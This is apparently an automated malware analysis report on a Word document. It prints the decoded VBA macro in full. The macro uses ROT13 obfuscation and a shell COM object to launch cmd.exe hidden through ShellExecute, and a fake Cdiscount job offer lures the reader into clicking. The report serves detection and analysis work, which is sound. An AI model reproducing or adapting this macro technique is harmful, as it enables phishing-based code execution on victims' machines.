Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 723a5a585456ff80…

MALICIOUS

Office (OLE)

64.0 KB Created: 2018-07-24 12:04:00 Authoring application: Microsoft Office Word First seen: 2019-01-11
MD5: 6fc7380ea7cc07c2b4a268f2662ed3e8 SHA-1: 7293b4bc9eeef8ecf5bd04cd7704f9d96bbf9ed5 SHA-256: 723a5a585456ff80549f8f3e290a89c4f51676c2af3d02821c760a98eb73ddbe
102 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros that use ShellExecute to launch a second-stage payload. The macro attempts to obfuscate the executable name as 'pzq.rkr' and uses a GetObject call with a suspicious argument. The document body presents a job offer to lure the user into interacting with the malicious content.

Heuristics 4

  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Function yolo()
        Set obj = GetObject(A("arj:P08NSQ90-S2N1-11Q1-8455-00N0P91S3880"))
        obj.Document.Application.ShellExecute A("pzq.rkr"), A(ActiveDocument.BuiltInDocumentProperties(A("Pbzzragf"))), "c:\windows\system32", Null, 0
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/officeDocument/2006/bibliography In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2255 bytes
SHA-256: c69b280aeca38bad7163e1d2953f26541110919ee8224bfba1952936d4a54803
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "CommandButton1, 0, 1, MSForms, CommandButton"

Function A(Test$) As String
  Dim tt As Long, x As Integer, y As Integer
  For tt = 1 To Len(Test$)
    y% = 0
    x% = Asc(Mid$(Test$, tt, 1))
    If (x% > 64 And x% < 91) Or (x% > 96 And x% < 123) Then
      y% = 13
      x% = x% - y%
      If x% < 97 And x% > 83 Then x% = x% + 26 Else If x% < 65 Then x% = x% + 26
    End If
    Mid$(Test$, tt, 1) = Chr$(x%)
  Next tt
  A = Test$
End Function

Function yolo()
    Set obj = GetObject(A("arj:P08NSQ90-S2N1-11Q1-8455-00N0P91S3880"))
    obj.Document.Application.ShellExecute A("pzq.rkr"), A(ActiveDocument.BuiltInDocumentProperties(A("Pbzzragf"))), "c:\windows\system32", Null, 0
    ActiveDocument.BuiltInDocumentProperties("category") = "1"
End Function

Private Sub CommandButton1_Click()
    If ActiveDocument.BuiltInDocumentProperties("category") = "0" Then
        yolo
    End If
    Selection.ParagraphFormat.Alignment = wdAlignParagraphLeft
    Selection.Font.Size = 11
    Selection.TypeText Text:="Vous l'aurez peut-être découvert, mais il s'agit de Cdiscount. Le poste est disponible à Bordeaux ou Paris. Selon profile le télétravail est possible avec déplacement occasionnel dans les locaux (à minima 2 jours par quinzaine)."
    Selection.TypeParagraph
    Selection.TypeText Text:="En plus du salaire très attractif, vous bénéficierez d'une excellente mutuelle, d'une crèche d'entreprise et de tarifs préférentiels sur l'ensemble des plateformes Cdiscount."
    Selection.TypeParagraph
    Selection.Font.Bold = True
    Selection.ParagraphFormat.Alignment = 1
    Selection.TypeText Text:="Cdiscount est bien + que vous ne le croyez : venez grandir avec nos équipes d'experts, cultiver votre talent et révolutionner le e-commerce tout en partageant les valeurs qui font notre force !"
    ActiveDocument.Shapes("Picture 1").Select
    Selection.ShapeRange.Delete
End Sub